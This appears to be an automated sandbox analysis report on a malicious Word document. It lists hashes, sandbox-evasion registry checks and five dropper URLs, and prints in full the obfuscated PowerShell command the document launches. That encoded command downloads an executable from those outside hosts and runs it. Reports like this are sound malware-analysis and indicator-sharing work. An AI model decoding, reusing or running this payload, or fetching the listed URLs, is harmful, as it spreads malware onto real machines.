Analysis
-
max time kernel
30s -
resource
win10v191014 -
submitted
27-01-2020 23:26
Task
task1
Sample
c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc
Resource
win10v191014
0 signatures
General
-
Target
c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc
-
Sample
200127-93afhw2q12
-
SHA256
c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
exe.dropper
http://camnangtrithuc.com/wp-admin/rysO51/
exe.dropper
http://srgasia.com.my/wp-content/vmcG8715/
exe.dropper
https://www.amedspor.com.tr/trsss/2aCO1Gkwg/
exe.dropper
https://uklid.ir/cgi-bin/8v/
exe.dropper
https://bffanmiefan.tk/cgi-bin/wYvv84846/
Signatures
-
Process spawned unexpected child process 1 IoCs
Processes:
Powershell.exedescription pid pid_target process target process Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4040 4916 Powershell.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz WINWORD.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
WINWORD.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily WINWORD.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU WINWORD.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
WINWORD.EXEpid process 4812 WINWORD.EXE -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
WINWORD.EXEpid process 4812 WINWORD.EXE
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE"C:\Program Files\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\c977f103e7ab73796c20a40a7f8a156f909dafcd005353990bf2ef2dfa6ccd7f.doc" /o ""1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:4812
-
C:\Windows\System32\WindowsPowerShell\v1.0\Powershell.exePowershell -w hidden -en JABPAG4AbQB6AGMAeQB2AGoAZQBvAG8APQAnAFMAegBmAHMAcQBxAGYAcQB1AHUAZQBrAHMAJwA7ACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACAAPQAgACcANQA1ADQAJwA7ACQATgBmAHoAdgBpAG8AZgBsAD0AJwBVAHQAZwBiAHkAaABpAGMAdAB0ACcAOwAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwA9ACQAZQBuAHYAOgB1AHMAZQByAHAAcgBvAGYAaQBsAGUAKwAnAFwAJwArACQARwBtAHcAagBiAGwAcwBrAGoAbwB5ACsAJwAuAGUAeABlACcAOwAkAFgAaQBxAHkAdAB0AGkAbwBrAGoAZwA9ACcASQBwAGUAcgBkAHUAdABjAGcAdwBsACcAOwAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAD0ALgAoACcAbgBlAHcALQBvACcAKwAnAGIAJwArACcAagBlACcAKwAnAGMAdAAnACkAIABOAEUAVAAuAHcAZQBCAEMAbABpAGUATgBUADsAJABTAHcAeQBjAHgAYgBoAG4AcwB2AD0AJwBoAHQAdABwADoALwAvAGMAYQBtAG4AYQBuAGcAdAByAGkAdABoAHUAYwAuAGMAbwBtAC8AdwBwAC0AYQBkAG0AaQBuAC8AcgB5AHMATwA1ADEALwAqAGgAdAB0AHAAOgAvAC8AcwByAGcAYQBzAGkAYQAuAGMAbwBtAC4AbQB5AC8AdwBwAC0AYwBvAG4AdABlAG4AdAAvAHYAbQBjAEcAOAA3ADEANQAvACoAaAB0AHQAcABzADoALwAvAHcAdwB3AC4AYQBtAGUAZABzAHAAbwByAC4AYwBvAG0ALgB0AHIALwB0AHIAcwBzAHMALwAyAGEAQwBPADEARwBrAHcAZwAvACoAaAB0AHQAcABzADoALwAvAHUAawBsAGkAZAAuAGkAcgAvAGMAZwBpAC0AYgBpAG4ALwA4AHYALwAqAGgAdAB0AHAAcwA6AC8ALwBiAGYAZgBhAG4AbQBpAGUAZgBhAG4ALgB0AGsALwBjAGcAaQAtAGIAaQBuAC8AdwBZAHYAdgA4ADQAOAA0ADYALwAnAC4AIgBTAFAAYABMAGkAVAAiACgAWwBjAGgAYQByAF0ANAAyACkAOwAkAFYAdwBiAHEAdgB2AHcAdwBoAHIAZQBqAD0AJwBEAGIAegBrAG4AegBrAHAAcwBkACcAOwBmAG8AcgBlAGEAYwBoACgAJABDAGgAYwBpAHUAZwBiAGcAYQB0AHQAYQAgAGkAbgAgACQAUwB3AHkAYwB4AGIAaABuAHMAdgApAHsAdAByAHkAewAkAEoAYgB4AGgAawBuAHIAcQBoAHAAdgBwAC4AIgBkAE8AVwBuAGAATABgAG8AYQBkAGYASQBMAEUAIgAoACQAQwBoAGMAaQB1AGcAYgBnAGEAdAB0AGEALAAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkAOwAkAFoAbQBvAHIAbABmAG8AYQB4AG0AbQA9ACcASwBrAHUAYgB4AGEAaABpAGgAcQBiACcAOwBJAGYAIAAoACgAJgAoACcARwBlAHQALQBJACcAKwAnAHQAZQBtACcAKQAgACQAWAB0AHkAcgB3AGQAcwB4AG8AbQBzACkALgAiAGwARQBgAE4AZwBUAEgAIgAgAC0AZwBlACAAMgA1ADAANQA4ACkAIAB7AFsARABpAGEAZwBuAG8AcwB0AGkAYwBzAC4AUAByAG8AYwBlAHMAcwBdADoAOgAiAHMAVABgAEEAcgBUACIAKAAkAFgAdAB5AHIAdwBkAHMAeABvAG0AcwApADsAJABLAGkAZgBkAHgAZgBmAHcAawBpAHEAZgB6AD0AJwBPAHIAbwBnAHYAYwBvAHAAbwB2AGQAZAAnADsAYgByAGUAYQBrADsAJABXAG4AawB6AGgAZQBzAHIAaQBvAG8APQAnAEEAbQBrAHMAYQBtAG8AdAB5AG0AYQAnAH0AfQBjAGEAdABjAGgAewB9AH0AJABWAHMAcgBoAHUAYgB5AGYAbwB2AGYAZgA9ACcAQgB3AGkAegBzAG0AbwBvAGQAZQBkACcA1⤵
- Process spawned unexpected child process
PID:4040